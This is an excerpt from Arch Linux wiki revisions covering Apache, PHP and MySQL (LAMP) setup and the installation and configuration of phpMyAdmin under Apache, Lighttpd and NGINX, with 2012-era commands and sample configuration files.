$ usermod -aG piter http<br />
<br />
* Of course, you have to give ''read'' and ''execute'' permissions on {{ic|~/}}, {{ic|~/public_html}}, and all other sub-folders in {{ic|~/public_html}} to the group members (group '''piter''' in our case). Do something like following ('''modify commands for your specific case'''):<br />
<br />
$ chmod g+xr-w /home/''yourusername''<br />
$ chmod -R g+xr-w /home/''yourusername''/public_html<br />
<br />
{{Note|This way you do not have to give access to your folder to every single user in order to give access to '''http user'''. Only '''http user''' and other potential users that are in '''piter''' group will have access to your home folder.}}<br />
<br />
and restart '''httpd'''.<br />
<br />
====SSL====<br />
Create self-signed certificate (you can change key size and days of validity)<br />
# cd /etc/httpd/conf<br />
# openssl genrsa -des3 -out server.key 1024<br />
# openssl req -new -key server.key -out server.csr<br />
# cp server.key server.key.org<br />
# openssl rsa -in server.key.org -out server.key<br />
# openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt<br />
In {{ic|/etc/httpd/conf/httpd.conf}} uncomment line<br />
Include conf/extra/httpd-ssl.conf<br />
and restart '''httpd'''.<br />
<br />
====Virtual Hosts====<br />
If you want to have more than one host, make sure you have<br />
{{bc|<br />
# Virtual hosts<br />
Include conf/extra/httpd-vhosts.conf<br />
}}<br />
in {{ic|/etc/httpd/conf/httpd.conf}}.<br />
<br />
In {{ic|/etc/httpd/conf/extra/httpd-vhosts.conf}} set your virtual hosts according the example, e.g.:<br />
{{bc|<br />
NameVirtualHost *:80<br />
<br />
#this first virtualhost enables: http://127.0.0.1, or: http://localhost, <br />
#to still go to /srv/http/*index.html(otherwise it will 404_error).<br />
#the reason for this: once you tell httpd.conf to include extra/httpd-vhosts.conf, <br />
#ALL vhosts are handled in httpd-vhosts.conf(including the default one),<br />
# E.G. the default virtualhost in httpd.conf is not used and must be included here, <br />
#otherwise, only domainname1.dom & domainname2.dom will be accessible<br />
#from your web browser and NOT http://127.0.0.1, or: http://localhost, etc.<br />
#<br />
<br />
<VirtualHost *:80><br />
DocumentRoot "/srv/http"<br />
ServerAdmin root@localhost<br />
ErrorLog "/var/log/httpd/127.0.0.1-error_log"<br />
CustomLog "/var/log/httpd/127.0.0.1-access_log" common<br />
<Directory /srv/http/><br />
DirectoryIndex index.htm index.html<br />
AddHandler cgi-script .cgi .pl<br />
Options ExecCGI Indexes FollowSymLinks MultiViews +Includes<br />
AllowOverride None<br />
Order allow,deny<br />
allow from all<br />
</Directory><br />
</VirtualHost><br />
<br />
<br />
<VirtualHost *:80><br />
ServerAdmin your@domainname1.dom<br />
DocumentRoot "/home/username/yoursites/domainname1.dom/www"<br />
ServerName domainname1.dom<br />
ServerAlias domainname1.dom<br />
<Directory /home/username/yoursites/domainname1.dom/www/><br />
DirectoryIndex index.htm index.html<br />
AddHandler cgi-script .cgi .pl<br />
Options ExecCGI Indexes FollowSymLinks MultiViews +Includes<br />
AllowOverride None<br />
Order allow,deny<br />
allow from all<br />
</Directory><br />
</VirtualHost><br />
<br />
<VirtualHost *:80><br />
ServerAdmin your@domainname2.dom<br />
DocumentRoot "/home/username/yoursites/domainname2.dom/www"<br />
ServerName domainname2.dom<br />
ServerAlias domainname2.dom<br />
<Directory /home/username/yoursites/domainname2.dom/www/><br />
DirectoryIndex index.htm index.html<br />
AddHandler cgi-script .cgi .pl<br />
Options ExecCGI Indexes FollowSymLinks MultiViews +Includes<br />
AllowOverride None<br />
Order allow,deny<br />
allow from all<br />
</Directory><br />
</VirtualHost><br />
}}<br />
<br />
Add your virtual host names to your {{ic|/etc/hosts}} file (NOT necessary if bind is serving these domains already, but will not hurt):<br />
{{bc|127.0.0.1 domainname1.dom<br />
127.0.0.1 domainname2.dom}}<br />
<br />
and restart '''httpd'''.<br />
<br />
If you setup your virtual hosts to be in your user directory, sometimes it interferes with Apache's 'Userdir' settings. To avoid problems disable 'Userdir' by commenting it out:<br />
{{bc|<br />
# User home directories<br />
#Include conf/extra/httpd-userdir.conf}}<br />
<br />
As said above, ensure that you have the proper permissions:<br />
# chmod 0775 /home/yourusername/<br />
<br />
If you have a huge amount of virtual hosts you easily want to dis- and enable, it's recommended to create one config file per virtualhost and store them all in one folder, eg: {{ic|/etc/httpd/conf/vhosts}}.<br />
<br />
First create the folder:<br />
# mkdir /etc/httpd/conf/vhosts<br />
<br />
Then place the single config files in them:<br />
# nano /etc/httpd/conf/vhosts/domainname1.dom<br />
# nano /etc/httpd/conf/vhosts/domainname2.dom<br />
...<br />
<br />
In the last step, "Include" the single configs in your {{ic|/etc/httpd/conf/httpd.conf}}:<br />
{{bc|#Enabled Vhosts:<br />
Include conf/vhosts/domainname1.dom<br />
#Include conf/vhosts/domainname1.dom}}<br />
<br />
You can enable and disable single virtual hosts by commenting them out or uncommenting them.<br />
<br />
====Advanced Options====<br />
These options in {{ic|/etc/httpd/conf/httpd.conf}} might be interesting for you:<br />
<br />
# Listen 80<br />
This is the port Apache will listen to. For Internet-access with router, you have to forward the port.<br />
<br />
If you setup Apache for local development you may want it to be only accessible from your computer. Then change this line to:<br />
# Listen 127.0.0.1:80<br />
<br />
This is the admin's email-address which can be found on e.g. error-pages:<br />
# ServerAdmin sample@sample.com<br />
<br />
This is the directory where you should put your web pages:<br />
# DocumentRoot "/srv/http"<br />
<br />
Change it, if you want to, but do not forget to also change the<br />
<Directory "/srv/http"><br />
to whatever you changed your DocumentRoot to, or you will likely get a 403 error (lack of privileges) when you try to access the new document root. Do not forget to change the Deny from all line, otherwise you will get 403 error too.<br />
<br />
# AllowOverride None<br />
This directive in {{ic|<Directory>}} sections causes apache to completely ignore .htaccess files. If you intend to use rewrite mod or other settings in .htaccess files, you can allow which directives declared in that file can override server configuration. For more info refer to http://httpd.apache.org/docs/current/mod/core.html#allowoverride<br />
<br />
{{Note|If you have issues with your configuration you can have apache check the configuration with:<br />
{{Ic|apachectl configtest}}}}<br />
<br />
===PHP===<br />
* Install the "php-apache" package from extra using pacman.<br />
<br />
* Add these lines in {{ic|/etc/httpd/conf/httpd.conf}}:<br />
:Place this in the "LoadModule" list anywhere after {{Ic|LoadModule dir_module modules/mod_dir.so}}:<br />
LoadModule php5_module modules/libphp5.so<br />
<br />
:Place this at the end of the "Include" list:<br />
Include conf/extra/php5_module.conf<br />
<br />
:Make sure that the following line is uncommented in httpd.conf in the section/(after the line){{Ic|<IfModule mime_module>}}:<br />
TypesConfig conf/mime.types<br />
<br />
:Uncomment the following line in httpd.conf(optional):<br />
MIMEMagicFile conf/magic<br />
<br />
* Add this line in {{ic|/etc/httpd/conf/mime.types}}:<br />
application/x-httpd-php5 php php5<br />
<br />
{{Note|If you do not see {{ic|libphp5.so}} in the Apache modules directory ({{Ic|/etc/httpd/modules}}), you may have forgotten to install the ''php-apache'' package.}}<br />
<br />
* If your {{Ic|DocumentRoot}} is not {{Ic|/srv/http}}, add it to {{Ic|open_basedir}} in {{ic|/etc/php/php.ini}} as such:<br />
open_basedir=/srv/http/:/home/:/tmp/:/usr/share/pear/:/path/to/documentroot<br />
<br />
* Restart the Apache service to make changes take effect:<br />
# rc.d restart httpd<br />
or, for systemd users<br />
# systemctl restart httpd<br />
<br />
* Create the file test.php in your Apache DocumentRoot Directory(E.G. /srv/http/ or ~/public_html) and inside it put:<br />
<?php phpinfo(); ?><br />
<br />
* Remember to copy this file to {{Ic|~/public_html}} if you permitted such a configuration.<!-- Also, remember to make it executable ({{Ic|chmod o+x test.php}}).--><br />
<br />
* Test PHP: http://localhost/test.php or http://localhost/~myname/test.php<br />
<br />
:If the PHP instruction is not executed (you see : <html>...</html>), check that you have added "Includes" to the "Options" line for your root directory in {{ic|/etc/httpd/conf/httpd.conf}}. Moreover, check that TypesConfig conf/mime.types is uncommented in the <IfModule mime_module> section, you may also try adding the following to the <IfModule mime_module> in httpd.conf:<br />
AddHandler application/x-httpd-php .php<br />
<br />
====Advanced options====<br />
* Remember to add a file handler for .phtml if you need it in {{ic|/etc/httpd/conf/extra/php5_module.conf}}:<br />
DirectoryIndex index.php index.phtml index.html<br />
<br />
* If you want the libGD module, install php-gd package and uncomment in {{ic|/etc/php/php.ini}}:<br />
{{Note|php-gd requires libpng, libjpeg, and freetype2}}<br />
;extension=gd.so<br />
to<br />
extension=gd.so<br />
<br />
:Pay attention to which extension you uncomment, as this extension is sometimes mentioned in an explanatory comment before the actual line you want to uncomment.<br />
<br />
<br />
* If you want to display errors to debug your php code, change this line of {{ic|/etc/php/php.ini}}:<br />
display_errors=Off<br />
to<br />
display_errors=On<br />
<br />
* If you want the mcrypt module, install php-mcrypt package and uncomment in {{ic|/etc/php/php.ini}}:<br />
;extension=mcrypt.so<br />
:to<br />
extension=mcrypt.so<br />
{{Warning|1=If you get error like:<br />
{{bc|<br />
[XXX Debug] PHP Notice: in file /index.php on line 86: date(): It is not safe to rely on the system'XXXX<br />
[XXX Debug] PHP Notice: in file /index.php on line 86: getdate(): It is not safe to rely on the system's timezone settings.XXXX}}<br />
<br />
change this line of {{ic|/etc/php/php.ini}} <br />
;date.timezone = <br />
to <br />
{{bc|1=date.timezone = Europe/Berlin}}<br />
}}<br />
{{note| more infos about [http://php.net/manual/en/datetime.configuration.php#ini.date.timezone Time Zone in PHP] }}<br />
restart httpd with <br />
# rc.d restart httpd<br />
or, for systemd users<br />
# systemctl restart httpd<br />
<br />
==== Using php5 with apache2-mpm-worker and mod_fcgid ====<br />
<br />
Uncomment following in {{ic|/etc/conf.d/apache}}:<br />
HTTPD=/usr/sbin/httpd.worker<br />
Uncomment following in {{ic|/etc/httpd/conf/httpd.conf}}:<br />
Include conf/extra/httpd-mpm.conf<br />
Install mod_fcgid and php-cgi packages:<br />
# pacman -S mod_fcgid php-cgi<br />
Create {{ic|/etc/httpd/conf/extra/php5_fcgid.conf}} with following content:<br />
{{bc|1=<br />
# Required modules: fcgid_module<br />
<br />
<IfModule fcgid_module><br />
AddHandler php-fcgid .php<br />
AddType application/x-httpd-php .php<br />
Action php-fcgid /fcgid-bin/php-fcgid-wrapper<br />
ScriptAlias /fcgid-bin/ /srv/http/fcgid-bin/<br />
SocketPath /var/run/httpd/fcgidsock<br />
SharememPath /var/run/httpd/fcgid_shm<br />
# If you don't allow bigger requests many applications may fail (such as WordPress login)<br />
FcgidMaxRequestLen 536870912<br />
PHP_Fix_Pathinfo_Enable 1<br />
# Path to php.ini – defaults to /etc/phpX/cgi<br />
DefaultInitEnv PHPRC=/etc/php/<br />
# Number of PHP childs that will be launched. Leave undefined to let PHP decide.<br />
#DefaultInitEnv PHP_FCGI_CHILDREN 3<br />
# Maximum requests before a process is stopped and a new one is launched<br />
#DefaultInitEnv PHP_FCGI_MAX_REQUESTS 5000<br />
<Location /fcgid-bin/><br />
SetHandler fcgid-script<br />
Options +ExecCGI<br />
</Location><br />
</IfModule><br />
}}<br />
<br />
Create needed directory and symlink for php wrapper:<br />
# mkdir /srv/http/fcgid-bin<br />
# ln -s /usr/bin/php-cgi /srv/http/fcgid-bin/php-fcgid-wrapper<br />
<br />
Edit {{ic|/etc/httpd/conf/httpd.conf:}}<br />
#LoadModule php5_module modules/libphp5.so<br />
LoadModule fcgid_module modules/mod_fcgid.so<br />
Include conf/extra/php5_fcgid.conf<br />
Make sure {{ic|/etc/php/php.ini}} has the directive enabled:<br />
cgi.fix_pathinfo=1<br />
Now you need to restart apache:<br />
# rc.d restart httpd<br />
or, for systemd users<br />
# systemctl restart httpd<br />
<br />
{{Note|1=As of Apache 2.4 (available as [http://aur.archlinux.org/packages.php?ID=60719 AUR package]) you can now use [http://httpd.apache.org/docs/2.4/mod/mod_proxy_fcgi.html mod_proxy_fcgi] (part of the official distribution) with PHP-FPM (and the new event MPM). See [http://wiki.apache.org/httpd/PHP-FPM configuration example]}}<br />
<br />
===MySQL===<br />
* Configure MySQL as described in [[MySQL]].<br />
<br />
* Edit {{ic|/etc/php/php.ini}} (this is in {{ic|/usr/etc}} on older systems) to uncomment the following lines (''By removing {{Ic|;}}''):<br />
;extension=mysqli.so<br />
;extension=mysql.so<br />
<br />
* You can add minor privileged users for your web scripts by editing the tables found in the {{Ic|mysql}} database. You have to restart MySQL for changes to take effect. Do not forget to check the {{Ic|mysql.user}} table: {{Ic|select User,Password from mysql.user;}}. If there is a second entry for root and your hostname is left with no password set, everybody from your host probably could gain full access. Perhaps see next section for these jobs.<br />
<br />
* Run in terminal:<br />
# rc.d start mysqld<br />
or, for systemd users<br />
# systemctl restart mysqld<br />
<br />
* You may also need to restart Apache. Run in terminal:<br />
# rc.d restart httpd<br />
or, for systemd users<br />
# systemctl restart httpd<br />
<br />
* MySQL should now be running. Set the root password and test it by running:<br />
# mysqladmin -u root password ''password''<br />
# mysql -u root -p<br />
<br />
:Type ''exit'' to exit from the CLI MySQL client<br />
<br />
* Edit {{ic|/etc/rc.conf}} (to start MySQL at boot):<br />
DAEMONS=(... '''mysqld''' ...)<br />
Or add this line to {{ic|rc.local}}:<br />
# rc.d start mysqld<br />
or, for systemd users<br />
# systemctl enable mysqld<br />
<br />
* You might also need to edit {{ic|/etc/mysql/my.cnf}} and comment out the {{Ic|skip-networking}} line as such:<br />
skip-networking<br />
to<br />
#skip-networking<br />
<br />
{{Tip|You may want to install [[PhpMyAdmin|phpmyadmin]], {{AUR|mysql-workbench}} or [[Adminer|adminer]] to work with your databases.}}<br />
<br />
==See also==<br />
* [[MySQL]] - Article for MySQL<br />
* [[PhpMyAdmin]] - Web frontend for MySQL typically found in LAMP environments<br />
* [[Adminer]] - A full-featured database management tool which is available for MySQL, PostgreSQL, SQLite, MS SQL and Oracle<br />
* [[Xampp]] - Self contained web-server that supports PHP, Perl, and MySQL<br />
* [[mod_perl]] - Apache + Perl<br />
<br />
==External links==<br />
* http://www.apache.org/<br />
* http://www.php.net/<br />
* http://www.mysql.com/<br />
* http://www.akadia.com/services/ssh_test_certificate.html<br />
* http://wiki.apache.org/httpd/CommonMisconfigurations</div>Wakehttps://wiki.archlinux.org/index.php?title=PhpMyAdmin&diff=234185PhpMyAdmin2012-11-07T03:26:07Z<p>Wake: /* Review apache phpmyadmin configuration */ rc.d deprecated.</p>
<hr />
<div>[[Category:Web Server]]<br />
{{lowercase title}}<br />
[[cs:PhpMyAdmin]]<br />
[[es:PhpMyAdmin]]<br />
[[fr:phpmyadmin]]<br />
[[ru:PhpMyAdmin]]<br />
[[tr:PhpMyAdmin]]<br />
[[zh-CN:PhpMyAdmin]]<br />
==Pre-Installation==<br />
See [[LAMP]] for a guide to setting up Apache, MySQL, and PHP.<br />
<br />
==Installation==<br />
To install [http://www.phpmyadmin.net/ phpMyAdmin], install the ''phpmyadmin'' and ''php-mcrypt'' packages with<br />
{{bc|<br />
pacman -S phpmyadmin php-mcrypt<br />
}}<br />
<br />
== Configuration ==<br />
Ensure you do not have an older copy of phpMyAdmin.<br />
{{bc|<br />
rm -r /srv/http/phpMyAdmin<br />
}}<br />
<br />
Copy the example configuration file to your httpd configuration directory.<br />
{{bc|<br />
cp /etc/webapps/phpmyadmin/apache.example.conf /etc/httpd/conf/extra/httpd-phpmyadmin.conf<br />
}}<br />
<br />
Add the following lines to {{ic|/etc/httpd/conf/httpd.conf}}:<br />
{{bc|<br />
# phpMyAdmin configuration<br />
Include conf/extra/httpd-phpmyadmin.conf<br />
}}<br />
<br />
You can type this into the terminal to produce the same effect:<br />
{{bc|<br />
echo -e "\nInclude conf/extra/httpd-phpmyadmin.conf" >> /etc/httpd/conf/httpd.conf<br />
}}<br />
<br />
=== Enable php handling in Apache ===<br />
<br />
Add the following lines to {{ic|/etc/httpd/conf/httpd.conf}}:<br />
{{bc|<br />
# Use for PHP 5.x:<br />
LoadModule php5_module modules/libphp5.so<br />
AddHandler php5-script php<br />
}}<br />
<br />
Add index.php after "DirectoryIndex index.html"<br />
{{bc|<br />
# DirectoryIndex: sets the file that Apache will serve if a directory<br />
# is requested.<br />
#<br />
<IfModule dir_module><br />
DirectoryIndex index.html index.php<br />
</IfModule><br />
}}<br />
<br />
=== Adjust access rights ===<br />
<br />
In {{ic|/etc/webapps/phpmyadmin/.htaccess}}, comment out ''deny from all''. The line should look like this:<br />
#deny from all<br />
<br />
Alternatively, you can restrict access to localhost and your local network only. Replace ''192.168.1.0/24'' with your network's IP block.<br />
deny from all<br />
allow from localhost<br />
allow from 192.168.1.0/24<br />
<br />
The lines above are not enough if you use ipv6 in {{ic|/etc/hosts}}. If so, add one more line to {{ic|/etc/webapps/phpmyadmin/.htaccess}}:<br />
allow from ::1<br />
<br />
Otherwise you'll get an error similar to "Error 403 - Access forbidden!" when you attempt to access your phpMyAdmin installation.<br />
<br />
=== Review apache phpmyadmin configuration ===<br />
<br />
Your {{ic|/etc/httpd/conf/extra/httpd-phpmyadmin.conf}} should have the following information:<br />
{{bc|<br />
Alias /phpmyadmin "/usr/share/webapps/phpMyAdmin"<br />
<Directory "/usr/share/webapps/phpMyAdmin"><br />
AllowOverride All<br />
Options FollowSymlinks<br />
Order allow,deny<br />
Allow from all<br />
php_admin_value open_basedir "/srv/:/tmp/:/usr/share/webapps/:/etc/webapps:/usr/share/pear/"<br />
</Directory><br />
}}<br />
<br />
You need the mcrypt (if you want phpmyadmin internal authentication) and mysql modules, so uncomment the following in {{ic|/etc/php/php.ini}}:<br />
extension=mcrypt.so<br />
extension=mysql.so<br />
extension=mysqli.so (optional)<br />
<br />
and restart Apache<br />
{{bc|# systemctl restart httpd (''deprecated:'' # rc.d restart httpd)}}.<br />
<br />
=== Add blowfish_secret passphrase ===<br />
If you see the following error message at the bottom of the page when you first log in to /phpmyadmin (using a previously setup MySQL username and password) :<br />
<br />
ERROR: The configuration file now needs a secret passphrase (blowfish_secret)<br />
<br />
You need to add a blowfish password to the phpMyAdmin's config file. Edit {{ic|/etc/webapps/phpmyadmin/config.inc.php}} and insert a random blowfish "password" in the line <br />
<br />
$cfg['blowfish_secret'] = ''; /* YOU MUST FILL IN THIS FOR COOKIE AUTH! */<br />
<br />
Go [http://www.question-defense.com/tools/phpmyadmin-blowfish-secret-generator here] to get a nicely generated blowfish_secret and paste it between the '' marks. It should now look something like this:<br />
<br />
$cfg['blowfish_secret'] = 'qtdRoGmbc9{8IZr323xYcSN]0s)r$9b_JUnb{~Xz'; /* YOU MUST FILL IN THIS FOR COOKIE AUTH! */<br />
<br />
The error should go away if you refresh the phpmyadmin page.<br />
<br />
=== Enabling Configuration Storage (optional) ===<br />
Now that the basic database server has been setup, it ''is'' functional, however by default, extra options such as table linking, change tracking, PDF creation, and bookmarking queries are disabled. You will see a message at the bottom of the main phpMyAdmin page, "The phpMyAdmin configuration storage is not completely configured, some extended features have been deactivated. To find out why...", This section addresses how to to enable these extra features.<br />
<br />
{{note|This example assumes you want to use the username '''pma''' as the controluser, and '''pmapass''' as the controlpass. These should be changed (the ''very'' least, you should change the password!) to something more secure.}}<br />
<br />
In {{ic|/etc/webapps/phpmyadmin/config.inc.php}}, uncomment (remove the leading "//"s on) these two lines, and change them to your desired credentials:<br />
{{bc|1=<br />
// $cfg['Servers'][$i]['controluser'] = 'pma';<br />
// $cfg['Servers'][$i]['controlpass'] = 'pmapass';<br />
}}<br />
You will need this information later, so keep it in mind.<br />
<br />
Beneath the controluser setup section, uncomment these lines:<br />
{{bc|1=<br />
/* Storage database and tables */<br />
// $cfg['Servers'][$i]['pmadb'] = 'phpmyadmin';<br />
// $cfg['Servers'][$i]['bookmarktable'] = 'pma_bookmark';<br />
// $cfg['Servers'][$i]['relation'] = 'pma_relation';<br />
// $cfg['Servers'][$i]['table_info'] = 'pma_table_info';<br />
// $cfg['Servers'][$i]['table_coords'] = 'pma_table_coords';<br />
// $cfg['Servers'][$i]['pdf_pages'] = 'pma_pdf_pages';<br />
// $cfg['Servers'][$i]['column_info'] = 'pma_column_info';<br />
// $cfg['Servers'][$i]['history'] = 'pma_history';<br />
// $cfg['Servers'][$i]['tracking'] = 'pma_tracking';<br />
// $cfg['Servers'][$i]['designer_coords'] = 'pma_designer_coords';<br />
// $cfg['Servers'][$i]['userconfig'] = 'pma_userconfig';<br />
// $cfg['Servers'][$i]['recent'] = 'pma_recent';<br />
}}<br />
<br />
Next, create the user with the above details. Don't set any permissions for it just yet.<br />
{{note|If you can't login to phpmyadmin, make sure that your mysql server is started.}}<br />
<br />
<br />
===== creating phpMyAdmin database =====<br />
Using the phpMyAdmin web interface:<br />
Import {{ic|/usr/share/webapps/phpMyAdmin/examples/create_tables.sql}} from phpMyAdmin -> Import.<br />
'''or'''<br />
Using command line:<br />
{{ic|mysql -uroot -p < /usr/share/webapps/phpMyAdmin/examples/create_tables.sql }}<br />
<br />
===== creating phpMyAdmin database user =====<br />
Now to apply the permissions to your controluser, in the SQL tab, make sure to replace all instances of 'pma' and 'pmapass' to the values set in config.inc.php. If you are setting this up for a remote database, then you must also change 'localhost' to the proper host:<br />
{{bc|<br />
GRANT USAGE ON mysql.* TO 'pma'@'localhost' IDENTIFIED BY 'pmapass';<br />
GRANT SELECT (<br />
Host, User, Select_priv, Insert_priv, Update_priv, Delete_priv,<br />
Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv,<br />
File_priv, Grant_priv, References_priv, Index_priv, Alter_priv,<br />
Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv,<br />
Execute_priv, Repl_slave_priv, Repl_client_priv<br />
) ON mysql.user TO 'pma'@'localhost';<br />
GRANT SELECT ON mysql.db TO 'pma'@'localhost';<br />
GRANT SELECT ON mysql.host TO 'pma'@'localhost';<br />
GRANT SELECT (Host, Db, User, Table_name, Table_priv, Column_priv)<br />
ON mysql.tables_priv TO 'pma'@'localhost';<br />
}}<br />
<br />
In order to take advantage of the bookmark and relation features, you will also need to give '''pma''' some additional permissions:<br />
{{Note|as long as you did not change the value of '''$cfg['Servers'][$i]['pmadb']''' in {{ic|/etc/webapps/phpmyadmin/config.inc.php}}, then '''<pma_db>''' should be '''phpmyadmin'''}}<br />
{{bc|GRANT SELECT, INSERT, UPDATE, DELETE ON <pma_db>.* TO 'pma'@'localhost';}}<br />
<br />
Log out, and back in to ensure the new features are activated. The message at the bottom of the main screen should now be gone.<br />
<br />
==Accessing your phpMyAdmin installation==<br />
Finally your phpmyadmin installation is complete. Before you start using it you need to restart your apache server by following command:<br />
<br />
{{bc|<br />
# rc.d restart httpd<br />
}}<br />
<br />
You can access your phpmyadmin installation using the following url:<br />
<br />
{{bc|<br />
http://localhost/phpmyadmin/<br />
or<br />
http://localhost/phpmyadmin/index.php<br />
}}<br />
<br />
Note: 'localhost' is the hostname in your /etc/rc.conf file.<br />
<br />
If you want to access it using:<br />
<br />
{{bc|<br />
http://localhost/phpmyadmin<br />
}}<br />
<br />
in '/etc/httpd/conf/extra/httpd-phpmyadmin.conf' change:<br />
<br />
{{bc|<br />
Alias /phpmyadmin/ "/usr/share/webapps/phpMyAdmin/"<br />
}}<br />
<br />
to<br />
<br />
{{bc|<br />
Alias /phpmyadmin "/usr/share/webapps/phpMyAdmin"<br />
}}<br />
<br />
You should also read [http://bbs.archlinux.org/viewtopic.php?pid=632500 this thread].<br />
<br />
If you get the error "#2002 - The server is not responding (or the local MySQL server's socket is not correctly configured)" then you might want to change "localhost" in /etc/webapps/phpmyadmin/config.inc.php on this line:<br />
<br />
{{bc|1=<br />
$cfg['Servers'][$i]['host'] = 'localhost';<br />
}}<br />
<br />
to your hostname specified in /etc/hosts and /etc/rc.conf under HOSTNAME.<br />
<br />
If you would like to use phpmyadmin setup script by calling http://localhost/phpmyadmin/setup you will need to create a config directory that's writeable by the httpd in the /usr/share/webapps/phpmyadmin as follows:<br />
<br />
{{bc|<br />
cd /usr/share/webapps/phpMyAdmin<br />
sudo mkdir config<br />
sudo chgrp http config<br />
sudo chmod g+w config<br />
}}<br />
<br />
==Lighttpd Configuration==<br />
The php setup for lighttpd is exactly the same as for apache.<br />
Make an alias for phpmyadmin in your lighttpd config.<br />
alias.url = ( "/phpmyadmin" => "/usr/share/webapps/phpMyAdmin/")<br />
Then enable mod_alias, mod_fastcgi and mod_cgi in your config ( server.modules section )<br />
<br />
Update open_basedir in /etc/php/php.ini and add "/usr/share/webapps/".<br />
open_basedir = /srv/http/:/home/:/tmp/:/usr/share/pear/:/usr/share/webapps/:/etc/webapps/<br />
<br />
Make sure lighttpd is setup to serve php files, [[Lighttpd]]<br />
<br />
Restart lighttpd and browse to http://localhost/phpmyadmin/index.php<br />
<br />
==NGINX Configuration==<br />
Also similar to apache configuration (and Lighttpd, for that matter).<br />
<br />
Create a symbolic link to the /usr/share/webapps/phpmyadmin directory from whichever directory your vhost is serving files from, e.g. /srv/http/<domain>/public_html/<br />
<br />
sudo ln -s /usr/share/webapps/phpMyAdmin /srv/http/<domain>/public_html/phpmyadmin<br />
<br />
You can also setup a sub domain with a server block like so (if using php-fpm):<br />
<br />
server {<br />
server_name phpmyadmin.<domain.tld>;<br />
access_log /srv/http/<domain>/logs/phpmyadmin.access.log;<br />
error_log /srv/http/<domain.tld>/logs/phpmyadmin.error.log;<br />
<br />
location / {<br />
root /srv/http/<domain.tld>/public_html/phpmyadmin;<br />
index index.html index.htm index.php;<br />
}<br />
<br />
location ~ \.php$ {<br />
root /srv/http/<domain.tld>/public_html/phpmyadmin;<br />
fastcgi_pass unix:/var/run/php-fpm/php-fpm.sock;<br />
fastcgi_index index.php;<br />
fastcgi_param SCRIPT_FILENAME /srv/http/<domain.tld>/public_html/phpmyadmin/$fastcgi_script_name;<br />
include fastcgi_params;<br />
}<br />
}<br />
<br />
Update open_basedir in /etc/php/php.ini and add "/usr/share/webapps/".<br />
open_basedir = /srv/http/:/home/:/tmp/:/usr/share/pear/:/usr/share/webapps/:/etc/webapps/<br />
<br />
You may run into some issues with phpmyadmin telling you "The Configuration File Now Needs A Secret Passphrase" and no matter what you enter, the error is still displayed. Try changing the ownership of the files to the NGINX specified user/group, e.g. nginx...<br />
<br />
sudo chown -R http:http /usr/share/webapps/phpMyAdmin<br />
<br />
If the above doesn't fix it try adding the following to your NGINX Configuration below the other fastcgi_param (I think its something to do with the Suhosin-Patch)<br />
<br />
fastcgi_param PHP_ADMIN_VALUE open_basedir="/srv/:/tmp/:/usr/share/webapps/:/etc/webapps:/usr/share/pear/";<br />
<br />
While you can enter anything for the blowfish password, you may want to choose a randomly generated string of characters (most likely for security reasons). Here's a handy tool that will do that for you on the web[http://www.question-defense.com/tools/phpmyadmin-blowfish-secret-generator].<br />
<br />
When using SSL, you might run into the problem that the links on the pages generated by phpMyAdmin incorrectly start with "http" instead of "https" which may cause errors. To fix this, you can add the following fcgi_param to your SSL-enabled server section (in addition to your usual fastcgi params):<br />
<br />
fastcgi_param HTTPS on;<br />
<br />
==Other (Older) information==<br />
<br />
This page holds a sample 'config.inc.php' file that you can place in the main phpMyAdmin directory so that it immediately starts working<br />
<br />
'''Things you should do first'''<br />
<br />
Create a 'controluser', so that phpmyadmin can read from the main mysql database.<br />
<br />
{{bc|mysql -u root -pYOURROOTPASSWORD<br />
mysql> grant usage on mysql.* to controluser@localhost identified by 'CONTROLPASS';<br />
}}<br />
<br />
'''Where is phpmyadmin'''<br />
<br />
in phpmyadmin 3.2.2-3 the file is missing /srv/http/ create this symlik<br />
<br />
{{bc|ln -s /usr/share/webapps/phpMyAdmin/ /srv/http/phpmyadmin<br />
}}<br />
<br />
'''Things you should change'''<br />
<br />
controluser is set to controluser <br><br />
controlpass is set to password <br><br />
verbose is set to name_of_server<br />
<br />
'''Sample 'config.inc.php' file'''<br />
{{bc|1=<br />
<?php<br />
/*<br />
* Generated configuration file<br />
* Generated by: phpMyAdmin 2.11.8.1 setup script by Michal Čihař <michal@cihar.com><br />
* Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $<br />
* Date: Mon, 01 Sep 2008 20:34:02 GMT<br />
*/<br />
<br />
/* Servers configuration */<br />
$i = 0;<br />
<br />
/* Server ravi-test-mysql (http) [1] */<br />
$i++;<br />
$cfg['Servers'][$i]['host'] = 'localhost';<br />
$cfg['Servers'][$i]['extension'] = 'mysql';<br />
$cfg['Servers'][$i]['port'] = '3306';<br />
$cfg['Servers'][$i]['connect_type'] = 'tcp';<br />
$cfg['Servers'][$i]['compress'] = false;<br />
$cfg['Servers'][$i]['controluser'] = 'controluser';<br />
$cfg['Servers'][$i]['controlpass'] = 'password';<br />
$cfg['Servers'][$i]['auth_type'] = 'http';<br />
$cfg['Servers'][$i]['verbose'] = 'name_of_server';<br />
<br />
/* End of servers configuration */<br />
<br />
$cfg['LeftFrameLight'] = true;<br />
$cfg['LeftFrameDBTree'] = true;<br />
$cfg['LeftFrameDBSeparator'] = '_';<br />
$cfg['LeftFrameTableSeparator'] = '__';<br />
$cfg['LeftFrameTableLevel'] = 1;<br />
$cfg['LeftDisplayLogo'] = true;<br />
$cfg['LeftDisplayServers'] = false;<br />
$cfg['DisplayServersList'] = false;<br />
$cfg['DisplayDatabasesList'] = 'auto';<br />
$cfg['LeftPointerEnable'] = true;<br />
$cfg['DefaultTabServer'] = 'main.php';<br />
$cfg['DefaultTabDatabase'] = 'db_structure.php';<br />
$cfg['DefaultTabTable'] = 'tbl_structure.php';<br />
$cfg['LightTabs'] = false;<br />
$cfg['ErrorIconic'] = true;<br />
$cfg['MainPageIconic'] = true;<br />
$cfg['ReplaceHelpImg'] = true;<br />
$cfg['NavigationBarIconic'] = 'both';<br />
$cfg['PropertiesIconic'] = 'both';<br />
$cfg['BrowsePointerEnable'] = true;<br />
$cfg['BrowseMarkerEnable'] = true;<br />
$cfg['ModifyDeleteAtRight'] = false;<br />
$cfg['ModifyDeleteAtLeft'] = true;<br />
$cfg['RepeatCells'] = 100;<br />
$cfg['DefaultDisplay'] = 'horizontal';<br />
$cfg['TextareaCols'] = 40;<br />
$cfg['TextareaRows'] = 7;<br />
$cfg['LongtextDoubleTextarea'] = true;<br />
